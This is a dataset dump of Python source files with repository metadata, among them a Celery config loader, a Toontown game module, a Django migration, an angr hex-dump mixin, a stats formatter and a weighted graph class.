"dbpostgres_ip":CONFIG.get(_CONFIG["SYSTEM"]["POSTGRESQL"],'ip'),
"dbpostgres_port":CONFIG.get(_CONFIG["SYSTEM"]["POSTGRESQL"],'port'),
"dbpostgres_user":CONFIG.get(_CONFIG["SYSTEM"]["POSTGRESQL"],'user'),
"dbpostgres_password":CONFIG.get(_CONFIG["SYSTEM"]["POSTGRESQL"],'password')
}
return dicConfig
except Exception as e:
print "~~~~celery config error~~~~"
print e
return False
finally:
if os.path.isfile('/var/www/spdpaas/config/deconstants_{}.conf'.format(str(get_request_start_time))):
with os.popen('/bin/rm /var/www/spdpaas/config/deconstants_{}.conf'.format(str(get_request_start_time))) as osrm:
osrm.read() | # -*- coding: utf-8 -*-
"""
==============================================================================
created : 02/08/2021
Last update: 02/08/2021
Developer: <NAME>
Lite Version 1 @Yishan08032019
Filename: celeryconfig.py
Description: about celery configuration
==============================================================================
"""
from kombu import Queue
class BaseConfig(object):
CELERY_ACCEPT_CONTENT= ['json']
CELERY_TASK_SERIALIZER= 'json'
CELERY_RESULT_SERIALIZER= 'json'
CELERY_ENABLE_UTC=True
CELERY_TIMEZONE='Asia/Taipei'
# CELERY_ACKS_LATE=True, #https://kknews.cc/zh-tw/code/5v5vj52.html
CELERYD_PREFETCH_MULTIPLIER=1
CELERYD_MAX_TASKS_PER_CHILD=50 #memory leak
CELERY_IGNORE_RESULT=True
CELERY_STORE_ERRORS_EVEN_IF_IGNORED=True
CELERY_TASK_CREATE_MISSING_QUEUES=False
CELERY_QUEUES = {
# Queue("default", routing_key = "default"),
# Queue("queue1", routing_key = "high", queue_arguments={'maxPriority': 10}), #https://github.com/squaremo/amqp.node/issues/165
Queue("H-queue1", routing_key = "high"),
Queue("L-queue1", routing_key = "low")
}
CELERY_TASK_ROUTES = {
'celeryApp.celeryTasks.celery_trigger_specific_program': {'queue': 'H-queue1','routing_key':'high'},
'celeryApp.celeryTasks.celery_post_api_count_record': {'queue': 'L-queue1','routing_key':'low'},
'celeryApp.celeryTasks.celery_send_email': {'queue': 'L-queue1','routing_key':'low'},
}
def readConfig():
import os, time
import ConfigParser
from app.globalvar import CONFIG as _CONFIG
try:
get_request_start_time = int(round(time.time()* 1000000))
if not os.path.isfile('/var/www/spdpaas/config/deconstants_{}.conf'.format(str(get_request_start_time))):
with os.popen('/usr/bin/openssl enc -aes-128-cbc -d -in /var/www/spdpaas/config/encconstants.conf -out /var/www/spdpaas/config/deconstants_{}.conf -pass <PASSWORD>:<PASSWORD>'.format(str(get_request_start_time))) as osdecrypt:
osdecrypt.read()
CONFPATH = "/var/www/spdpaas/config/deconstants_{}.conf".format(str(get_request_start_time))
CONFIG = ConfigParser.ConfigParser()
CONFIG.read(CONFPATH)
dicConfig = {
"celery_broker":CONFIG.get('Celery', 'broker'),
"celery_result_backend":CONFIG.get('Celery', 'result_backend'),
"dbpostgres_ip":CONFIG.get(_CONFIG["SYSTEM"]["POSTGRESQL"],'ip'),
"dbpostgres_port":CONFIG.get(_CONFIG["SYSTEM"]["POSTGRESQL"],'port'),
"dbpostgres_user":CONFIG.get(_CONFIG["SYSTEM"]["POSTGRESQL"],'user'),
"dbpostgres_password":CONFIG.get(_CONFIG["SYSTEM"]["POSTGRESQL"],'password')
}
return dicConfig
except Exception as e:
print "~~~~celery config error~~~~"
print e
return False
finally:
if os.path.isfile('/var/www/spdpaas/config/deconstants_{}.conf'.format(str(get_request_start_time))):
with os.popen('/bin/rm /var/www/spdpaas/config/deconstants_{}.conf'.format(str(get_request_start_time))) as osrm:
osrm.read() | ceb | 0.330101 | 1.941023 | 2 |
toontown/coghq/LawbotHQExterior.py | journeyfan/toontown-journey | 1 | 13581 | from direct.directnotify import DirectNotifyGlobal
from direct.fsm import ClassicFSM, State
from direct.fsm import State
from pandac.PandaModules import *
from toontown.battle import BattlePlace
from toontown.building import Elevator
from toontown.coghq import CogHQExterior
from toontown.dna.DNAParser import loadDNAFileAI
from libpandadna import DNAStorage
from toontown.hood import ZoneUtil
from toontown.toonbase import ToontownGlobals
class LawbotHQExterior(CogHQExterior.CogHQExterior):
notify = DirectNotifyGlobal.directNotify.newCategory('LawbotHQExterior')
def enter(self, requestStatus):
CogHQExterior.CogHQExterior.enter(self, requestStatus)
# Load the CogHQ DNA file:
dnaStore = DNAStorage()
dnaFileName = self.genDNAFileName(self.zoneId)
loadDNAFileAI(dnaStore, dnaFileName)
# Collect all of the vis group zone IDs:
self.zoneVisDict = {}
for i in range(dnaStore.getNumDNAVisGroupsAI()):
groupFullName = dnaStore.getDNAVisGroupName(i)
visGroup = dnaStore.getDNAVisGroupAI(i)
visZoneId = int(base.cr.hoodMgr.extractGroupName(groupFullName))
visZoneId = ZoneUtil.getTrueZoneId(visZoneId, self.zoneId)
visibles = []
for i in range(visGroup.getNumVisibles()):
visibles.append(int(visGroup.getVisible(i)))
visibles.append(ZoneUtil.getBranchZone(visZoneId))
self.zoneVisDict[visZoneId] = visibles
# Next, we want interest in all vis groups due to this being a Cog HQ:
base.cr.sendSetZoneMsg(self.zoneId, list(self.zoneVisDict.values())[0])
| from direct.directnotify import DirectNotifyGlobal
from direct.fsm import ClassicFSM, State
from direct.fsm import State
from pandac.PandaModules import *
from toontown.battle import BattlePlace
from toontown.building import Elevator
from toontown.coghq import CogHQExterior
from toontown.dna.DNAParser import loadDNAFileAI
from libpandadna import DNAStorage
from toontown.hood import ZoneUtil
from toontown.toonbase import ToontownGlobals
class LawbotHQExterior(CogHQExterior.CogHQExterior):
notify = DirectNotifyGlobal.directNotify.newCategory('LawbotHQExterior')
def enter(self, requestStatus):
CogHQExterior.CogHQExterior.enter(self, requestStatus)
# Load the CogHQ DNA file:
dnaStore = DNAStorage()
dnaFileName = self.genDNAFileName(self.zoneId)
loadDNAFileAI(dnaStore, dnaFileName)
# Collect all of the vis group zone IDs:
self.zoneVisDict = {}
for i in range(dnaStore.getNumDNAVisGroupsAI()):
groupFullName = dnaStore.getDNAVisGroupName(i)
visGroup = dnaStore.getDNAVisGroupAI(i)
visZoneId = int(base.cr.hoodMgr.extractGroupName(groupFullName))
visZoneId = ZoneUtil.getTrueZoneId(visZoneId, self.zoneId)
visibles = []
for i in range(visGroup.getNumVisibles()):
visibles.append(int(visGroup.getVisible(i)))
visibles.append(ZoneUtil.getBranchZone(visZoneId))
self.zoneVisDict[visZoneId] = visibles
# Next, we want interest in all vis groups due to this being a Cog HQ:
base.cr.sendSetZoneMsg(self.zoneId, list(self.zoneVisDict.values())[0])
| pt | 0.127213 | 2.074017 | 2 |
etsy_convos/convos/migrations/0005_convothread_last_message_at.py | jessehon/etsy-convos | 2 | 13582 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('convos', '0004_auto_20150511_0945'),
]
operations = [
migrations.AddField(
model_name='convothread',
name='last_message_at',
field=models.DateTimeField(null=True, verbose_name='Last message at', blank=True),
),
]
| # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('convos', '0004_auto_20150511_0945'),
]
operations = [
migrations.AddField(
model_name='convothread',
name='last_message_at',
field=models.DateTimeField(null=True, verbose_name='Last message at', blank=True),
),
]
| fr | 0.176995 | 1.52433 | 2 |
pycoax/examples/40_eab.py | lowobservable/coax | 21 | 13583 | #!/usr/bin/env python
import sys
from itertools import chain
from common import open_example_serial_interface
from coax import read_feature_ids, parse_features, Feature, LoadAddressCounterHi, LoadAddressCounterLo, WriteData, EABWriteAlternate, EABLoadMask
def get_features(interface):
commands = read_feature_ids()
ids = interface.execute(commands)
return parse_features(ids, commands)
def eab_alternate_zip(regen_buffer, eab_buffer):
return bytes(chain(*zip(regen_buffer, eab_buffer)))
with open_example_serial_interface() as interface:
features = get_features(interface)
if Feature.EAB not in features:
sys.exit('No EAB feature found.')
eab_address = features[Feature.EAB]
print(f'EAB feature found at address {eab_address}')
# Protected Normal
interface.execute([LoadAddressCounterHi(0), LoadAddressCounterLo(80)])
regen_buffer = bytes.fromhex('e0 08 00 af 91 8e 93 84 82 93 84 83 00 ad 8e 91 8c 80 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09')
interface.execute(WriteData(regen_buffer))
# Protected Intense
interface.execute([LoadAddressCounterHi(0), LoadAddressCounterLo(160)])
regen_buffer = bytes.fromhex('e8 08 00 af 91 8e 93 84 82 93 84 83 00 a8 8d 93 84 8d 92 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09')
interface.execute(WriteData(regen_buffer))
# Normal EFA
interface.execute([LoadAddressCounterHi(1), LoadAddressCounterLo(64)])
regen_buffer = bytes.fromhex('e0 08 00 ad 8e 91 8c 80 8b 00 a4 a5 a0 00 00 00 00 00 00 00 00 00 00 b7 bf 00 a1 bf 00 b1 bf 00 ac bf 00 a6 bf 00 a2 bf 00 b8 bf 00 b6 bf 00 00 09 e0')
eab_buffer = bytes.fromhex('00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 10 00 00 18 00 00 20 00 00 28 00 00 30 00 00 38 00 00 00 00 00')
interface.execute(EABWriteAlternate(eab_address, eab_alternate_zip(regen_buffer, eab_buffer)))
# Blink EFA
interface.execute([LoadAddressCounterHi(1), LoadAddressCounterLo(144)])
regen_buffer = bytes.fromhex('e0 08 00 a1 8b 88 8d 8a 00 a4 a5 a0 00 00 00 00 00 00 00 00 00 00 00 b7 bf 00 a1 bf 00 b1 bf 00 ac bf 00 a6 bf 00 a2 bf 00 b8 bf 00 b6 bf 00 00 09 e0')
eab_buffer = bytes.fromhex('40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 10 00 00 18 00 00 20 00 00 28 00 00 30 00 00 38 00 00 00 00 00')
interface.execute(EABWriteAlternate(eab_address, eab_alternate_zip(regen_buffer, eab_buffer)))
# Reverse EFA
interface.execute([LoadAddressCounterHi(1), LoadAddressCounterLo(224)])
regen_buffer = bytes.fromhex('e0 08 00 b1 84 95 84 91 92 84 00 a4 a5 a0 00 00 00 00 00 00 00 00 00 b7 bf 00 a1 bf 00 b1 bf 00 ac bf 00 a6 bf 00 a2 bf 00 b8 bf 00 b6 bf 00 00 09 e0')
eab_buffer = bytes.fromhex('80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 10 00 00 18 00 00 20 00 00 28 00 00 30 00 00 38 00 00 00 00 00')
interface.execute(EABWriteAlternate(eab_address, eab_alternate_zip(regen_buffer, eab_buffer)))
# Underline EFA
interface.execute([LoadAddressCounterHi(2), LoadAddressCounterLo(48)])
regen_buffer = bytes.fromhex('e0 08 00 b4 8d 83 84 91 8b 88 8d 84 00 a4 a5 a0 00 00 00 00 00 00 00 b7 bf 00 a1 bf 00 b1 bf 00 ac bf 00 a6 bf 00 a2 bf 00 b8 bf 00 b6 bf 00 00 09 e0')
eab_buffer = bytes.fromhex('c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 10 00 00 18 00 00 20 00 00 28 00 00 30 00 00 38 00 00 00 00 00')
interface.execute(EABWriteAlternate(eab_address, eab_alternate_zip(regen_buffer, eab_buffer)))
| #!/usr/bin/env python
import sys
from itertools import chain
from common import open_example_serial_interface
from coax import read_feature_ids, parse_features, Feature, LoadAddressCounterHi, LoadAddressCounterLo, WriteData, EABWriteAlternate, EABLoadMask
def get_features(interface):
commands = read_feature_ids()
ids = interface.execute(commands)
return parse_features(ids, commands)
def eab_alternate_zip(regen_buffer, eab_buffer):
return bytes(chain(*zip(regen_buffer, eab_buffer)))
with open_example_serial_interface() as interface:
features = get_features(interface)
if Feature.EAB not in features:
sys.exit('No EAB feature found.')
eab_address = features[Feature.EAB]
print(f'EAB feature found at address {eab_address}')
# Protected Normal
interface.execute([LoadAddressCounterHi(0), LoadAddressCounterLo(80)])
regen_buffer = bytes.fromhex('e0 08 00 af 91 8e 93 84 82 93 84 83 00 ad 8e 91 8c 80 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09')
interface.execute(WriteData(regen_buffer))
# Protected Intense
interface.execute([LoadAddressCounterHi(0), LoadAddressCounterLo(160)])
regen_buffer = bytes.fromhex('e8 08 00 af 91 8e 93 84 82 93 84 83 00 a8 8d 93 84 8d 92 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09')
interface.execute(WriteData(regen_buffer))
# Normal EFA
interface.execute([LoadAddressCounterHi(1), LoadAddressCounterLo(64)])
regen_buffer = bytes.fromhex('e0 08 00 ad 8e 91 8c 80 8b 00 a4 a5 a0 00 00 00 00 00 00 00 00 00 00 b7 bf 00 a1 bf 00 b1 bf 00 ac bf 00 a6 bf 00 a2 bf 00 b8 bf 00 b6 bf 00 00 09 e0')
eab_buffer = bytes.fromhex('00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 10 00 00 18 00 00 20 00 00 28 00 00 30 00 00 38 00 00 00 00 00')
interface.execute(EABWriteAlternate(eab_address, eab_alternate_zip(regen_buffer, eab_buffer)))
# Blink EFA
interface.execute([LoadAddressCounterHi(1), LoadAddressCounterLo(144)])
regen_buffer = bytes.fromhex('e0 08 00 a1 8b 88 8d 8a 00 a4 a5 a0 00 00 00 00 00 00 00 00 00 00 00 b7 bf 00 a1 bf 00 b1 bf 00 ac bf 00 a6 bf 00 a2 bf 00 b8 bf 00 b6 bf 00 00 09 e0')
eab_buffer = bytes.fromhex('40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 10 00 00 18 00 00 20 00 00 28 00 00 30 00 00 38 00 00 00 00 00')
interface.execute(EABWriteAlternate(eab_address, eab_alternate_zip(regen_buffer, eab_buffer)))
# Reverse EFA
interface.execute([LoadAddressCounterHi(1), LoadAddressCounterLo(224)])
regen_buffer = bytes.fromhex('e0 08 00 b1 84 95 84 91 92 84 00 a4 a5 a0 00 00 00 00 00 00 00 00 00 b7 bf 00 a1 bf 00 b1 bf 00 ac bf 00 a6 bf 00 a2 bf 00 b8 bf 00 b6 bf 00 00 09 e0')
eab_buffer = bytes.fromhex('80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 10 00 00 18 00 00 20 00 00 28 00 00 30 00 00 38 00 00 00 00 00')
interface.execute(EABWriteAlternate(eab_address, eab_alternate_zip(regen_buffer, eab_buffer)))
# Underline EFA
interface.execute([LoadAddressCounterHi(2), LoadAddressCounterLo(48)])
regen_buffer = bytes.fromhex('e0 08 00 b4 8d 83 84 91 8b 88 8d 84 00 a4 a5 a0 00 00 00 00 00 00 00 b7 bf 00 a1 bf 00 b1 bf 00 ac bf 00 a6 bf 00 a2 bf 00 b8 bf 00 b6 bf 00 00 09 e0')
eab_buffer = bytes.fromhex('c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 10 00 00 18 00 00 20 00 00 28 00 00 30 00 00 38 00 00 00 00 00')
interface.execute(EABWriteAlternate(eab_address, eab_alternate_zip(regen_buffer, eab_buffer)))
| pt | 0.200439 | 2.423584 | 2 |
ApkInstall/Case/TV/DeviceConnect.py | LiuTianen/PackManage | 0 | 13584 | # coding=utf-8
from Base.DevicesList import devicesList as dl
from Base.Common import Common
class DevicesConnect:
def deviceConnect(self):
commands = []
data = dl().get_Tv_IP()
for IP in data:
cmd = "adb connect %s" %(IP)
commands.append(cmd)
Common().loop_threads(commands)
if __name__ == '__main__':
DevicesConnect().deviceConnect()
| # coding=utf-8
from Base.DevicesList import devicesList as dl
from Base.Common import Common
class DevicesConnect:
def deviceConnect(self):
commands = []
data = dl().get_Tv_IP()
for IP in data:
cmd = "adb connect %s" %(IP)
commands.append(cmd)
Common().loop_threads(commands)
if __name__ == '__main__':
DevicesConnect().deviceConnect()
| ceb | 0.154836 | 2.439932 | 2 |
angr/storage/memory_mixins/hex_dumper_mixin.py | Kyle-Kyle/angr | 6,132 | 13585 | import string
from ...errors import SimValueError
from . import MemoryMixin
class HexDumperMixin(MemoryMixin):
def hex_dump(self, start, size, word_size=4, words_per_row=4, endianness="Iend_BE",
symbolic_char='?', unprintable_char='.', solve=False, extra_constraints=None,
inspect=False, disable_actions=True):
"""
Returns a hex dump as a string. The solver, if enabled, is called once for every byte
potentially making this function very slow. It is meant to be used mainly as a
"visualization" for debugging.
Warning: May read and display more bytes than `size` due to rounding. Particularly,
if size is less than, or not a multiple of word_size*words_per_line.
:param start: starting address from which to print
:param size: number of bytes to display
:param word_size: number of bytes to group together as one space-delimited unit
:param words_per_row: number of words to display per row of output
:param endianness: endianness to use when displaying each word (ASCII representation is unchanged)
:param symbolic_char: the character to display when a byte is symbolic and has multiple solutions
:param unprintable_char: the character to display when a byte is not printable
:param solve: whether or not to attempt to solve (warning: can be very slow)
:param extra_constraints: extra constraints to pass to the solver is solve is True
:param inspect: whether or not to trigger SimInspect breakpoints for the memory load
:param disable_actions: whether or not to disable SimActions for the memory load
:return: hex dump as a string
"""
if endianness == "Iend_BE":
end = 1
else:
end = -1
if extra_constraints is None:
extra_constraints = []
# round up size so that chop() works
line_size = word_size * words_per_row
size = size if size % line_size == 0 else size + line_size - size % line_size
raw_mem = super().load(start, size=size, inspect=inspect, disable_actions=disable_actions)
i = start
dump_str = ""
for line in raw_mem.chop(line_size * self.state.arch.byte_width):
dump = "%x:" % i
group_str = ""
for word in line.chop(word_size * self.state.arch.byte_width):
word_bytes = ""
word_str = ""
for byte_ in word.chop(self.state.arch.byte_width)[::end]:
byte_value = None
if not self.state.solver.symbolic(byte_) or solve:
try:
byte_value = self.state.solver.eval_one(
byte_,
extra_constraints=extra_constraints
)
except SimValueError:
pass
if byte_value is not None:
word_bytes += "%02x" % byte_value
if chr(byte_value) in string.printable[:-5]:
word_str += chr(byte_value)
else:
word_str += unprintable_char
else:
word_bytes += symbolic_char*2
word_str += symbolic_char
dump += ' ' + word_bytes
group_str += word_str[::end] # always print ASCII representation in little-endian
dump += ' ' + group_str
i += line_size
dump_str += dump + '\n'
return dump_str
| import string
from ...errors import SimValueError
from . import MemoryMixin
class HexDumperMixin(MemoryMixin):
def hex_dump(self, start, size, word_size=4, words_per_row=4, endianness="Iend_BE",
symbolic_char='?', unprintable_char='.', solve=False, extra_constraints=None,
inspect=False, disable_actions=True):
"""
Returns a hex dump as a string. The solver, if enabled, is called once for every byte
potentially making this function very slow. It is meant to be used mainly as a
"visualization" for debugging.
Warning: May read and display more bytes than `size` due to rounding. Particularly,
if size is less than, or not a multiple of word_size*words_per_line.
:param start: starting address from which to print
:param size: number of bytes to display
:param word_size: number of bytes to group together as one space-delimited unit
:param words_per_row: number of words to display per row of output
:param endianness: endianness to use when displaying each word (ASCII representation is unchanged)
:param symbolic_char: the character to display when a byte is symbolic and has multiple solutions
:param unprintable_char: the character to display when a byte is not printable
:param solve: whether or not to attempt to solve (warning: can be very slow)
:param extra_constraints: extra constraints to pass to the solver is solve is True
:param inspect: whether or not to trigger SimInspect breakpoints for the memory load
:param disable_actions: whether or not to disable SimActions for the memory load
:return: hex dump as a string
"""
if endianness == "Iend_BE":
end = 1
else:
end = -1
if extra_constraints is None:
extra_constraints = []
# round up size so that chop() works
line_size = word_size * words_per_row
size = size if size % line_size == 0 else size + line_size - size % line_size
raw_mem = super().load(start, size=size, inspect=inspect, disable_actions=disable_actions)
i = start
dump_str = ""
for line in raw_mem.chop(line_size * self.state.arch.byte_width):
dump = "%x:" % i
group_str = ""
for word in line.chop(word_size * self.state.arch.byte_width):
word_bytes = ""
word_str = ""
for byte_ in word.chop(self.state.arch.byte_width)[::end]:
byte_value = None
if not self.state.solver.symbolic(byte_) or solve:
try:
byte_value = self.state.solver.eval_one(
byte_,
extra_constraints=extra_constraints
)
except SimValueError:
pass
if byte_value is not None:
word_bytes += "%02x" % byte_value
if chr(byte_value) in string.printable[:-5]:
word_str += chr(byte_value)
else:
word_str += unprintable_char
else:
word_bytes += symbolic_char*2
word_str += symbolic_char
dump += ' ' + word_bytes
group_str += word_str[::end] # always print ASCII representation in little-endian
dump += ' ' + group_str
i += line_size
dump_str += dump + '\n'
return dump_str
| pt | 0.103146 | 2.947202 | 3 |
src/greplin/scales/formats.py | frenzymadness/scales | 273 | 13586 | # Copyright 2011 The scales Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Formatting methods for stats."""
from greplin import scales
import cgi
import six
import json
import operator
import re
OPERATORS = {
'>=': operator.ge,
'>': operator.gt,
'<': operator.lt,
'<=': operator.le,
'=': operator.eq,
'==': operator.eq,
'!=': operator.ne
}
OPERATOR = re.compile('(%s)' % '|'.join(list(OPERATORS.keys())))
def runQuery(statDict, query):
"""Filters for the given query."""
parts = [x.strip() for x in OPERATOR.split(query)]
assert len(parts) in (1, 3)
queryKey = parts[0]
result = {}
for key, value in six.iteritems(statDict):
if key == queryKey:
if len(parts) == 3:
op = OPERATORS[parts[1]]
try:
queryValue = type(value)(parts[2]) if value else parts[2]
except (TypeError, ValueError):
continue
if not op(value, queryValue):
continue
result[key] = value
elif isinstance(value, scales.StatContainer) or isinstance(value, dict):
child = runQuery(value, query)
if child:
result[key] = child
return result
def htmlHeader(output, path, serverName, query = None):
"""Writes an HTML header."""
if path and path != '/':
output.write('<title>%s - Status: %s</title>' % (serverName, path))
else:
output.write('<title>%s - Status</title>' % serverName)
output.write('''
<style>
body,td { font-family: monospace }
.level div {
padding-bottom: 4px;
}
.level .level {
margin-left: 2em;
padding: 1px 0;
}
span { color: #090; vertical-align: top }
.key { color: black; font-weight: bold }
.int, .float { color: #00c }
</style>
''')
output.write('<h1 style="margin: 0">Stats</h1>')
output.write('<h3 style="margin: 3px 0 18px">%s</h3>' % serverName)
output.write(
'<p><form action="#" method="GET">Filter: <input type="text" name="query" size="20" value="%s"></form></p>' %
(query or ''))
def htmlFormat(output, pathParts = (), statDict = None, query = None):
"""Formats as HTML, writing to the given object."""
statDict = statDict or scales.getStats()
if query:
statDict = runQuery(statDict, query)
_htmlRenderDict(pathParts, statDict, output)
def _htmlRenderDict(pathParts, statDict, output):
"""Render a dictionary as a table - recursing as necessary."""
keys = list(statDict.keys())
keys.sort()
links = []
output.write('<div class="level">')
for key in keys:
keyStr = cgi.escape(_utf8str(key))
value = statDict[key]
if hasattr(value, '__call__'):
value = value()
if hasattr(value, 'keys'):
valuePath = pathParts + (keyStr,)
if isinstance(value, scales.StatContainer) and value.isCollapsed():
link = '/status/' + '/'.join(valuePath)
links.append('<div class="key"><a href="%s">%s</a></div>' % (link, keyStr))
else:
output.write('<div class="key">%s</div>' % keyStr)
_htmlRenderDict(valuePath, value, output)
else:
output.write('<div><span class="key">%s</span> <span class="%s">%s</span></div>' %
(keyStr, type(value).__name__, cgi.escape(_utf8str(value)).replace('\n', '<br/>')))
if links:
for link in links:
output.write(link)
output.write('</div>')
def _utf8str(x):
"""Like str(x), but returns UTF8."""
if six.PY3:
return str(x)
if isinstance(x, six.binary_type):
return x
elif isinstance(x, six.text_type):
return x.encode('utf-8')
else:
return six.binary_type(x)
def jsonFormat(output, statDict = None, query = None, pretty = False):
"""Formats as JSON, writing to the given object."""
statDict = statDict or scales.getStats()
if query:
statDict = runQuery(statDict, query)
indent = 2 if pretty else None
# At first, assume that strings are in UTF-8. If this fails -- if, for example, we have
# crazy binary data -- then in order to get *something* out, we assume ISO-8859-1,
# which maps each byte to a unicode code point.
try:
serialized = json.dumps(statDict, cls=scales.StatContainerEncoder, indent=indent)
except UnicodeDecodeError:
serialized = json.dumps(statDict, cls=scales.StatContainerEncoder, indent=indent, encoding='iso-8859-1')
output.write(serialized)
output.write('\n')
| # Copyright 2011 The scales Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Formatting methods for stats."""
from greplin import scales
import cgi
import six
import json
import operator
import re
OPERATORS = {
'>=': operator.ge,
'>': operator.gt,
'<': operator.lt,
'<=': operator.le,
'=': operator.eq,
'==': operator.eq,
'!=': operator.ne
}
OPERATOR = re.compile('(%s)' % '|'.join(list(OPERATORS.keys())))
def runQuery(statDict, query):
"""Filters for the given query."""
parts = [x.strip() for x in OPERATOR.split(query)]
assert len(parts) in (1, 3)
queryKey = parts[0]
result = {}
for key, value in six.iteritems(statDict):
if key == queryKey:
if len(parts) == 3:
op = OPERATORS[parts[1]]
try:
queryValue = type(value)(parts[2]) if value else parts[2]
except (TypeError, ValueError):
continue
if not op(value, queryValue):
continue
result[key] = value
elif isinstance(value, scales.StatContainer) or isinstance(value, dict):
child = runQuery(value, query)
if child:
result[key] = child
return result
def htmlHeader(output, path, serverName, query = None):
"""Writes an HTML header."""
if path and path != '/':
output.write('<title>%s - Status: %s</title>' % (serverName, path))
else:
output.write('<title>%s - Status</title>' % serverName)
output.write('''
<style>
body,td { font-family: monospace }
.level div {
padding-bottom: 4px;
}
.level .level {
margin-left: 2em;
padding: 1px 0;
}
span { color: #090; vertical-align: top }
.key { color: black; font-weight: bold }
.int, .float { color: #00c }
</style>
''')
output.write('<h1 style="margin: 0">Stats</h1>')
output.write('<h3 style="margin: 3px 0 18px">%s</h3>' % serverName)
output.write(
'<p><form action="#" method="GET">Filter: <input type="text" name="query" size="20" value="%s"></form></p>' %
(query or ''))
def htmlFormat(output, pathParts = (), statDict = None, query = None):
"""Formats as HTML, writing to the given object."""
statDict = statDict or scales.getStats()
if query:
statDict = runQuery(statDict, query)
_htmlRenderDict(pathParts, statDict, output)
def _htmlRenderDict(pathParts, statDict, output):
"""Render a dictionary as a table - recursing as necessary."""
keys = list(statDict.keys())
keys.sort()
links = []
output.write('<div class="level">')
for key in keys:
keyStr = cgi.escape(_utf8str(key))
value = statDict[key]
if hasattr(value, '__call__'):
value = value()
if hasattr(value, 'keys'):
valuePath = pathParts + (keyStr,)
if isinstance(value, scales.StatContainer) and value.isCollapsed():
link = '/status/' + '/'.join(valuePath)
links.append('<div class="key"><a href="%s">%s</a></div>' % (link, keyStr))
else:
output.write('<div class="key">%s</div>' % keyStr)
_htmlRenderDict(valuePath, value, output)
else:
output.write('<div><span class="key">%s</span> <span class="%s">%s</span></div>' %
(keyStr, type(value).__name__, cgi.escape(_utf8str(value)).replace('\n', '<br/>')))
if links:
for link in links:
output.write(link)
output.write('</div>')
def _utf8str(x):
"""Like str(x), but returns UTF8."""
if six.PY3:
return str(x)
if isinstance(x, six.binary_type):
return x
elif isinstance(x, six.text_type):
return x.encode('utf-8')
else:
return six.binary_type(x)
def jsonFormat(output, statDict = None, query = None, pretty = False):
"""Formats as JSON, writing to the given object."""
statDict = statDict or scales.getStats()
if query:
statDict = runQuery(statDict, query)
indent = 2 if pretty else None
# At first, assume that strings are in UTF-8. If this fails -- if, for example, we have
# crazy binary data -- then in order to get *something* out, we assume ISO-8859-1,
# which maps each byte to a unicode code point.
try:
serialized = json.dumps(statDict, cls=scales.StatContainerEncoder, indent=indent)
except UnicodeDecodeError:
serialized = json.dumps(statDict, cls=scales.StatContainerEncoder, indent=indent, encoding='iso-8859-1')
output.write(serialized)
output.write('\n')
| pt | 0.159694 | 2.357569 | 2 |
src/weight_graph.py | kavdi/data-structures | 0 | 13587 | """Implement a weighted graph."""
class Graph(object):
"""Structure for values in a weighted graph."""
def __init__(self):
"""Create a graph with no values."""
self.graph = {}
def nodes(self):
"""Get all nodes in the graph to display in list form."""
return list(self.graph)
def edges(self):
"""Get all edges in graph to display in list of tuples with weights."""
edge_list = []
for start in self.graph:
for end in self.graph[start]:
edge_list.append((start, end, self.graph[start][end]))
return edge_list
def add_node(self, val):
"""Add a node with a value to the graph."""
self.graph.setdefault(val, {})
def add_edge(self, val1, val2, weight):
"""Add an edge from val1 to val2 with the given weight.
If the node for either value does not exist, it is added to the graph.
"""
if val1 == val2:
raise ValueError('Edge needs two different values.')
self.add_node(val1)
self.add_node(val2)
self.graph[val1][val2] = weight
def del_node(self, val):
"""Remove the node with the given value from the graph.
Also removes all edges connected to the node.
"""
if val not in self.graph:
raise ValueError('Value is not in the graph.')
del self.graph[val]
for node in self.graph:
if val in self.graph[node]:
del self.graph[node][val]
def del_edge(self, val1, val2):
"""Remove the edge connecting node of val1 to node of val2."""
try:
del self.graph[val1][val2]
except KeyError:
raise ValueError('Edge is not in the graph.')
def has_node(self, val):
"""Check if the given value is in the graph."""
return val in self.graph
def neighbors(self, val):
"""List all nodes the node of the given value connects to."""
if val not in self.nodes():
raise ValueError('Value is not in the graph.')
return list(self.graph[val])
def adjacent(self, val1, val2):
"""Check if there is an edge connecting the nodes with given values."""
if val1 not in self.nodes() or val2 not in self.nodes():
raise ValueError('Value is not in the graph.')
return val2 in self.graph[val1]
